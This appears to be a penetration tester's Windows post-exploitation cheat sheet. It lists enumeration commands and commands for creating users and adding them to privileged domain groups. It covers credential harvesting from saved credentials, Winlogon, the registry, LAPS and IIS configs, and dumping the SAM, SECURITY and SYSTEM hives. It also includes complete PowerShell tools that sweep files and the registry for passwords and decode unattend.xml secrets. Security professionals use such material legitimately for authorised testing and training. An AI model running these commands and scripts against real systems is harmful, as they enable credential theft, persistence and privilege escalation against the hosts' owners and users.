M4RCG04M

Enumeration

Basic Microsoft Windows Enumeration

whoami /all
whoami /user
systeminfo
net accounts
net user
net user /domain
net user <USERNAME>
Get-LocalUser
Get-LocalGroup
Get-LocalGroupMember <GROUP>
Get-Process
tree /f C:\Users\
tasklist /SVC
sc query
sc qc <SERVICE>
netsh firewall show state
schtasks /query /fo LIST /v
wmic qfe get Caption,Description,HotFixID,InstalledOn
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path

Network Information

Interface(s), IP Address(es), DNS Information

ipconfig /all

ARP Table

arp -a 

Routing Table

route print

Enumerating Protections

Check Windows Defender Status

Get-MpComputerStatus

List AppLocker Rules

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

Test AppLocker Policy

Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone

System Information

Tasklist

Using the tasklist command to look at running processes will give us a better idea of what applications are currently running on the system.

tasklist /svc

Display All Environment Variables

set

View Detailed Configuration Information

systeminfo
wmic qfe

// PowerShell
Get-HotFix | ft -AutoSize

Installed Programs

wmic product get name

// Powershell
Get-WmiObject -Class Win32_Product | select Name, Version

Both commands query the Win32_Product class, which makes Windows Installer run a consistency check (and possibly a repair) of every MSI package: it is slow and writes MsiInstaller events to the Application log. When noise matters, read the Uninstall keys under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall instead.

Display Active Network Connections

netstat lists active TCP and UDP connections and listening sockets: -a includes listeners, -n keeps addresses numeric, -o adds the owning PID (match it against tasklist /svc). Note which listeners are bound to 127.0.0.1 or ::1 only; those services are reachable from the box but not from outside.

netstat -ano
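The same information as netstat -ano, joined to the owning process and with loopback-only listeners flagged, as an added PowerShell example (not from the original page). It assumes Windows 8 / Server 2012 or later for Get-NetTCPConnection and Get-NetUDPEndpoint; the function name Get-ListeningPortReport is this example's own.

```powershell
# Added example, not part of the original page: map every listening TCP/UDP
# port to its owning process and mark loopback-only listeners. Assumes
# Windows 8 / Server 2012 or later (Get-NetTCPConnection / Get-NetUDPEndpoint).
function Get-ListeningPortReport {
    [CmdletBinding()]
    param()

    # Resolve PIDs to names once. Protected processes may be unreadable, so a
    # missing entry is reported as <unknown> instead of aborting the report.
    $nameByPid = @{}
    Get-Process -ErrorAction SilentlyContinue | ForEach-Object { $nameByPid[$_.Id] = $_.ProcessName }

    # OwningProcess is UInt32; cast to Int32 so hashtable lookups against Get-Process IDs match.
    $tcp = Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue |
        ForEach-Object { [PSCustomObject]@{ Proto = 'TCP'; Addr = $_.LocalAddress; Port = $_.LocalPort; OwnerPid = [int]$_.OwningProcess } }
    $udp = Get-NetUDPEndpoint -ErrorAction SilentlyContinue |
        ForEach-Object { [PSCustomObject]@{ Proto = 'UDP'; Addr = $_.LocalAddress; Port = $_.LocalPort; OwnerPid = [int]$_.OwningProcess } }

    @($tcp) + @($udp) | ForEach-Object {
        $loopback = $_.Addr -in @('127.0.0.1', '::1')
        [PSCustomObject]@{
            Proto        = $_.Proto
            LocalAddress = $_.Addr
            LocalPort    = $_.Port
            PID          = $_.OwnerPid
            Process      = if ($nameByPid.ContainsKey($_.OwnerPid)) { $nameByPid[$_.OwnerPid] } else { '<unknown>' }
            # Loopback-only services cannot be reached from the attacker's host;
            # they are candidates for port forwarding once a foothold exists.
            Scope        = if ($loopback) { 'loopback-only' } else { 'all-interfaces' }
        }
    } | Sort-Object Proto, LocalPort, LocalAddress
}

$report = Get-ListeningPortReport
$report | Format-Table -AutoSize

# Services bound only to 127.0.0.1 / ::1 deserve a second look (local databases, admin consoles).
$report | Where-Object { $_.Scope -eq 'loopback-only' } | Format-Table -AutoSize
```

The Process column is '<unknown>' for PIDs that Get-Process could not read, which as a low-privileged user usually means a SYSTEM or protected process; the PID is still there to cross-reference with tasklist /svc.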

Listing Named Pipes with Pipelist

pipelist.exe /accepteula

After obtaining a listing of named pipes, we can use Accesschk to enumerate the permissions assigned to a specific named pipe by reviewing its Discretionary Access Control List (DACL), which shows us who has the permissions to modify, write, read, or execute the resource.

accesschk.exe /accepteula \\.\Pipe\lsass -v

Check all named pipes that allow write access

accesschk.exe -w \pipe\* -v

User & Group Information

Logged-In Users

query user

Current User

echo %USERNAME%
whoami

Current User Privileges

whoami /priv

Current User Group Information

whoami /groups

Get All Users

net user

Get All Groups

net localgroup

Details About a Group

net localgroup administrators

Get Password Policy & Other Account Information

net accounts

Show hidden Files and Folders

dir /a                          // all files and folders, hidden and system ones included
dir /a:d                        // directories only, hidden ones included
dir /a:h                        // hidden files and folders only
cmd /c dir /A                   // the same three, run from a PowerShell prompt
cmd /c dir /A:D
cmd /c dir /A:H
powershell ls -force            // Get-ChildItem -Force: hidden and system items included

User Handling

Creating Users and Adding Them to Groups

net user <USERNAME> <PASSWORD> /add /domain
net group "Exchange Windows Permissions" <USERNAME> /add /domain
net localgroup "Remote Management Users" <USERNAME> /add

net group works on domain groups (needs /domain and rights in the domain), net localgroup on local groups; in both the user name comes before /add.

Credential Harvesting

Quick Wins

cmdkey /list
rundll32 keymgr.dll, KRShowKeyMgr
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

Search for Passwords

findstr /si password *.xml *.ini *.txt
dir /s *pass* == *.config
dir /s *pass* == *cred* == *vnc* == *.config*
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users\<USERNAME>\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.vbs -File -Recurse -ErrorAction SilentlyContinue

PowerShell History

Get-History
(Get-PSReadlineOption).HistorySavePath
type C:\Users\%username%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
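The file-name and content searches above, together with the PSReadLine history of every profile, folded into one sweep as an added PowerShell example (not from the original page). The roots, name patterns and regex are this example's assumptions to adjust for the target, and the demo input at the bottom is constructed, not a real artifact.

```powershell
# Added example, not part of the original page: hunt for credential artifacts
# by file name AND content under a set of roots, including every profile's
# PSReadLine history. Roots, name patterns and the regex are assumptions.
function Find-CredentialArtifacts {
    [CmdletBinding()]
    param(
        [string[]]$Roots = @('C:\Users', 'C:\inetpub', 'C:\xampp', 'C:\Windows\Panther', 'C:\Windows\System32\sysprep'),
        # Names worth reporting even when the content scan finds nothing
        [string[]]$NamePatterns = @('*pass*', '*cred*', '*vnc*', '*.config', '*.kdbx', '*.ini', 'unattend*.xml',
                                    'sysprep*', 'ConsoleHost_history.txt', 'web.config', '*.rdp', '*.ppk'),
        # Lines worth reporting when found inside a text file
        [string]$ContentRegex = '(password|passwd|pass|pwd|secret|api[_-]?key|token|connectionstring)\s*[=:]\s*\S+',
        [int]$MaxSizeKB = 512
    )

    foreach ($root in $Roots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }

        Get-ChildItem -LiteralPath $root -Recurse -File -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            $nameHit = $false
            foreach ($pattern in $NamePatterns) {
                if ($file.Name -like $pattern) { $nameHit = $true; break }
            }

            # Content scan only for small files: binaries rarely matter and big
            # logs make the sweep slow. Select-String is case-insensitive by default.
            $contentHits = @()
            if ($file.Length -le ($MaxSizeKB * 1KB)) {
                $contentHits = @(Select-String -LiteralPath $file.FullName -Pattern $ContentRegex -ErrorAction SilentlyContinue |
                    Select-Object -First 5)
            }

            if ($nameHit -or $contentHits.Count -gt 0) {
                [PSCustomObject]@{
                    Path      = $file.FullName
                    NameMatch = $nameHit
                    Hits      = ($contentHits | ForEach-Object { "$($_.LineNumber): $($_.Line.Trim())" }) -join ' | '
                }
            }
        }
    }
}

# Constructed demo input (not a real target): a scratch folder holding a fake
# web.config and a fake PSReadLine history, so the function can be tried offline.
$demo = Join-Path $env:TEMP 'credhunt-demo'
New-Item -ItemType Directory -Path (Join-Path $demo 'PSReadLine') -Force | Out-Null
Set-Content -LiteralPath (Join-Path $demo 'web.config') -Value '<connectionStrings><add name="db" connectionString="Server=db1;User Id=sa;Password=S3cret!" /></connectionStrings>'
Set-Content -LiteralPath (Join-Path $demo 'PSReadLine\ConsoleHost_history.txt') -Value @('Get-Process', 'cmdkey /add:fs01 /user:corp\svc_backup /pass:Winter2024!')
Find-CredentialArtifacts -Roots $demo | Format-List
```

Against the demo folder both files come back: web.config on name and on its connectionString/Password line, the history file on name and on the cmdkey line. On a real host run it with the default roots and expect a long list; the Hits column is what separates a file that merely has "pass" in its name from one that actually contains a credential.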

Saved Windows Credentials

cmdkey /list
runas /savecred /user:<USERNAME> cmd.exe

runas /savecred only works when cmdkey /list shows a stored credential for that user; the new cmd.exe then runs as that user without a password prompt.

Winlogon Credentials

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Local Administrator Password Solution (LAPS)

Get-ADComputer <RHOST> -property 'ms-mcs-admpwd'

Needs the ActiveDirectory module (RSAT) and an account with read rights on the attribute. Legacy LAPS stores the password in ms-Mcs-AdmPwd; Windows LAPS uses msLAPS-Password instead.

Search the Registry for Passwords

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
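The registry sweep above limited to REG_SZ values, extended to every value type and to value names, plus an explicit read of the Winlogon autologon values, as an added PowerShell example (not from the original page). The hive list and regex are this example's assumptions, and the value it plants under HKCU for the demo is constructed and removed again.

```powershell
# Added example, not part of the original page: recursive registry sweep that
# matches a regex against value NAMES and DATA of every value type (reg query
# /f ... /t REG_SZ only matches strings), plus a direct read of the Winlogon
# autologon values. Hive list and regex are assumptions; unreadable keys are skipped.
function Find-RegistryCredentials {
    [CmdletBinding()]
    param(
        [string[]]$Hives = @('HKLM:\SOFTWARE', 'HKLM:\SYSTEM\CurrentControlSet\Services', 'HKCU:\Software'),
        [string]$Pattern = 'passw|pwd|credential|secret|apikey'
    )

    foreach ($hive in $Hives) {
        if (-not (Test-Path -LiteralPath $hive)) { continue }
        # Include the root key itself: Get-ChildItem -Recurse only yields subkeys.
        $keys = @(Get-Item -LiteralPath $hive -ErrorAction SilentlyContinue) +
                @(Get-ChildItem -LiteralPath $hive -Recurse -ErrorAction SilentlyContinue)

        foreach ($key in $keys) {
            foreach ($valueName in $key.GetValueNames()) {
                $data = $key.GetValue($valueName)
                # REG_BINARY is rendered as hex; REG_MULTI_SZ is joined with spaces by [string].
                $text = if ($data -is [byte[]]) { ($data | ForEach-Object { $_.ToString('x2') }) -join '' } else { [string]$data }
                if ($valueName -match $Pattern -or $text -match $Pattern) {
                    [PSCustomObject]@{
                        Key  = $key.Name
                        Name = $valueName
                        Type = $key.GetValueKind($valueName)
                        Data = if ($text.Length -gt 120) { $text.Substring(0, 120) + '...' } else { $text }
                    }
                }
            }
        }
    }
}

# The Winlogon values deserve a direct read: a DefaultPassword is a cleartext
# credential whatever the value is called, and only matters with AutoAdminLogon=1.
function Get-AutoLogonCredential {
    $p = Get-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -ErrorAction SilentlyContinue
    if ($p -and $p.DefaultPassword) {
        [PSCustomObject]@{
            AutoAdminLogon = $p.AutoAdminLogon
            Domain         = $p.DefaultDomainName
            UserName       = $p.DefaultUserName
            Password       = $p.DefaultPassword
        }
    }
}

# Constructed demo: plant two values under HKCU so the sweep has something to
# find, run it against that key only, then clean up. A full sweep of
# HKLM:\SOFTWARE takes minutes; narrow the hive list or run it in the background.
$demoKey = 'HKCU:\Software\CredSweepDemo'
New-Item -Path $demoKey -Force | Out-Null
Set-ItemProperty -Path $demoKey -Name 'DbPassword' -Value 'Spring2024!'
Set-ItemProperty -Path $demoKey -Name 'Note' -Value 'the secret: hunter2'
Find-RegistryCredentials -Hives $demoKey | Format-Table -AutoSize
Remove-Item -Path $demoKey -Recurse -Force
Get-AutoLogonCredential
```

In the demo the first value is found by its name (DbPassword) and the second by its data (the word "secret"), which is exactly the distinction reg query /f blurs; widen the regex with product names once you know what software runs on the host.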

Dumping Credentials

Needs local administrator rights (or SeBackupPrivilege). SAM holds the local account hashes, SYSTEM the boot key that decrypts them and SECURITY the LSA secrets and cached domain credentials, so take all three and parse them offline.

reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save

Find KeePass Databases

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

Internet Information Services (IIS)

C:\Windows\System32\inetsrv\appcmd.exe list apppool /@:*
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

appcmd lists the application pools with the identity each runs under; a custom identity is stored in applicationHost.config and appcmd run as an administrator can show it with its password. The web.config above is the machine-wide one; the per-site web.config files under C:\inetpub\wwwroot\ (or the physical paths appcmd reports for each site) usually hold the connection strings.

Unattended Windows Installations

C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
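Reading the answer-file locations above and decoding what they hold, as an added PowerShell example (not from the original page). Sysprep stores a non-plaintext value as Base64 of the UTF-16LE password with the element name ("AdministratorPassword" or "Password") appended, and stripping that suffix recovers the cleartext. The legacy sysprep.inf is INI rather than XML and is not covered; the answer file the demo at the bottom writes to %TEMP% is constructed, not a real artifact.

```powershell
# Added example, not part of the original page: pull the password elements out
# of the unattend/sysprep answer files listed above and decode them. Non-plaintext
# values are Base64(UTF-16LE(password + element name)); the suffix is stripped.
function Get-UnattendPasswords {
    [CmdletBinding()]
    param(
        [string[]]$Paths = @(
            'C:\Unattend.xml',
            'C:\Windows\Panther\Unattend.xml',
            'C:\Windows\Panther\Unattend\Unattend.xml',
            'C:\Windows\system32\sysprep\sysprep.xml'
        )
    )

    foreach ($path in $Paths) {
        if (-not (Test-Path -LiteralPath $path)) { continue }
        $doc = New-Object System.Xml.XmlDocument
        try { $doc.Load($path) } catch { continue }   # unreadable or not XML

        # local-name() sidesteps the urn:schemas-microsoft-com:unattend default namespace.
        foreach ($el in $doc.SelectNodes('//*[local-name()="AdministratorPassword" or local-name()="Password"]')) {
            $valueNode = $el.SelectSingleNode('*[local-name()="Value"]')
            if ($null -eq $valueNode) { continue }
            $value = $valueNode.InnerText
            $plainNode = $el.SelectSingleNode('*[local-name()="PlainText"]')
            $declaredPlain = ($null -ne $plainNode -and $plainNode.InnerText -eq 'true')

            # Decode when PlainText is false, and opportunistically when the flag is
            # absent: in that case accept the result only if it carries the suffix.
            if (-not $declaredPlain) {
                try {
                    $decoded = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($value))
                    if ($decoded.EndsWith($el.LocalName)) {
                        $value = $decoded.Substring(0, $decoded.Length - $el.LocalName.Length)
                    } elseif ($null -ne $plainNode) {
                        $value = $decoded      # PlainText=false but no suffix: report the raw decode
                    }
                } catch { }                    # not Base64: leave the value as it is
            }

            $userNode = $el.ParentNode.SelectSingleNode('*[local-name()="Username" or local-name()="Name"]')
            [PSCustomObject]@{
                File     = $path
                Context  = $el.ParentNode.LocalName     # UserAccounts, AutoLogon, LocalAccount, ...
                User     = if ($null -ne $userNode) { $userNode.InnerText } else { '' }
                Password = $value
            }
        }
    }
}

# Constructed demo answer file: "P@ssw0rd" encoded the way Windows SIM does it,
# i.e. Base64(UTF-16LE("P@ssw0rd" + "AdministratorPassword")), plus a cleartext AutoLogon.
$demoXml = Join-Path $env:TEMP 'unattend-demo.xml'
$encoded = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('P@ssw0rd' + 'AdministratorPassword'))
@"
<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <UserAccounts>
        <AdministratorPassword>
          <Value>$encoded</Value>
          <PlainText>false</PlainText>
        </AdministratorPassword>
      </UserAccounts>
      <AutoLogon>
        <Username>svc_deploy</Username>
        <Password>
          <Value>Autumn2024!</Value>
          <PlainText>true</PlainText>
        </Password>
      </AutoLogon>
    </component>
  </settings>
</unattend>
"@ | Set-Content -LiteralPath $demoXml -Encoding UTF8
Get-UnattendPasswords -Paths $demoXml | Format-Table -AutoSize
```

The demo yields the decoded administrator password and the AutoLogon credential for svc_deploy. The User column is empty for AdministratorPassword because that element sits directly under UserAccounts; for LocalAccount and AutoLogon entries it carries the sibling Name or Username.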